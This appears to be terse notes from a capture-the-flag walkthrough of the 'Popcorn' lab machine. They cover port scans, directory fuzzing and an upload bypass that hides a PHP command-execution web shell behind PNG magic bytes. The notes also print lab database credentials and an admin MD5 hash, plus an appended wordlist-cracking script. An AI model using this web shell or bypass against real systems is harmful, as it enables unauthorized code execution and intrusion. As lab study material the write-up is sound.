Machine - PopCorn - Linux - Medium
22/tcp open ssh syn-ack ttl 63
80/tcp open http syn-ack ttl 63
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.1p1 Debian 6ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 3e:c8:1b:15:21:15:50:ec:6e:63:bc:c5:6b:80:7b:38 (DSA)
|_ 2048 aa:1f:79:21:b8:42:f4:8a:38:bd:b8:05:ef:1a:07:4d (RSA)
80/tcp open http Apache httpd 2.2.12 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.2.12 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.2.12 ((Ubuntu))
| http-enum:
| /test/: Test page
| /test.php: Test page
| /test/logon.html: Jetty
|_ /icons/: Potentially interesting folder w/ directory listing
|_http-server-header: Apache/2.2.12 (Ubuntu)
- php5.2.10
- ubuntu 6.10
- the /test folder always shows a phpinfo() page
- fuzzing for .txt or .php
000004023: 301 9 L 28 W 310 Ch "torrent"
000011416: 301 9 L 28 W 309 Ch "rename"
- in /torrent
- we can upload a torrent
- let’s try to modify the torrent to add a cmd …
- no way :(
- there is a way to upload a PNG
- I could upload the PNG, but I saw no way of executing it
- let’s see if I can move it with the rename endpoint
- yay! we got our magic PHP shell :)
echo -n -e '\x89\x50\x4E\x47' > img.php.png   # PNG magic bytes first, so the upload check sees an image
echo '<?php system($_GET["cmd"]); ?>' >> img.php.png   # then the PHP one-liner, run once the file is renamed to .php
from www-data to george or root
- enumeration
- mysql local
- pspy
- nothing interesting
- sudo -l → nothing
- the source code of torrenthoster is there
- let’s copy it to my PC
$CFG->host = "localhost";
$CFG->dbName = "torrenthoster"; //db name
$CFG->dbUserName = "torrent"; //db username
$CFG->dbPassword = "SuperSecret!!"; //db password
| 3 | Admin | d5bfedcee289e5e05b86daad8ee3e2e2 | admin | admin@yourdomain.com | 2007-01-06 21:12:46 | 2007-01-06 21:12:46 |
- let’s try to crack the MD5 hash … no luck :(
- abandon!
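An added example (not from the notes or from torrenthoster) of the wordlist check that the "crack the MD5 hash" step amounts to: torrenthoster stores an unsalted 32-hex-char MD5, so each candidate costs one hash and the usual mistake is hashing "word\n" instead of "word". The wordlist is constructed inline; the plaintext of the Admin hash above is not known here, so the demo only reports that this tiny list does not contain it.

```shell
#!/bin/sh
# Added example; not code from the original notes or from torrenthoster.
# Checks an unsalted MD5 against a wordlist, one hash per candidate.

# md5_hex STRING: lowercase MD5 of STRING without a trailing newline.
md5_hex() {
    if command -v md5sum >/dev/null 2>&1; then
        printf '%s' "$1" | md5sum | cut -d' ' -f1
    else
        printf '%s' "$1" | md5 -q      # macOS fallback
    fi
}

# md5_wordlist_check HASH WORDLIST: print the first matching word and return 0;
# return 1 once the list is exhausted. HASH may be upper- or lowercase.
md5_wordlist_check() {
    target=$(printf '%s' "$1" | tr 'A-F' 'a-f')
    while IFS= read -r word || [ -n "$word" ]; do
        [ "$(md5_hex "$word")" = "$target" ] && { printf '%s\n' "$word"; return 0; }
    done < "$2"
    return 1
}

# make_demo_wordlist OUT: constructed three-word list for the demo, not a real one.
make_demo_wordlist() {
    printf '%s\n' admin password letmein > "$1"
}

if [ "${1:-}" = "demo" ]; then
    wl=$(mktemp)
    make_demo_wordlist "$wl"
    md5_wordlist_check d5bfedcee289e5e05b86daad8ee3e2e2 "$wl" || echo "no match for the Admin hash in the demo list"
    rm -f "$wl"
fi
```

For a real attempt, point `md5_wordlist_check` at rockyou or run the hash through john/hashcat in raw-md5 mode; the function exists to make the unsalted, per-word nature of the check explicit.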